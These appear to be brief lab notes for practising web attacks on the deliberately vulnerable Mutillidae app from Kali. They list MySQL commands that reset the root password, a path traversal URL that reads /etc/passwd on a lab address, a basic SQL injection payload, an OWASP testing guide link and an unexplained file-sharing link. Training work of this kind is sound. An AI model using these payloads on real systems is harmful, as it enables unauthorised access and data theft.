LABORATORIO 

kali 

Mutillidae 2.8.83  (ubuntu 18.10)

Metasploit 3

mutillidae 

use mysql 

update user set authentication_string=PASSWORD(‘mutillidae’) where user=’root’; 

update user set plugin=’mysql_native_password’ where user=’root’; 

flush privileges; 

exit;

path transversal

http://192.168.2.110/mutillidae/index.php?page=/etc/passwd

sqli extract data 

   ' or 1=1 --

https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf

https://mega.nz/#!n9gjWAaT!OY89LcxS_HKu1h1PCg294MkmDa8rsVCY7Jfz-cL8dtw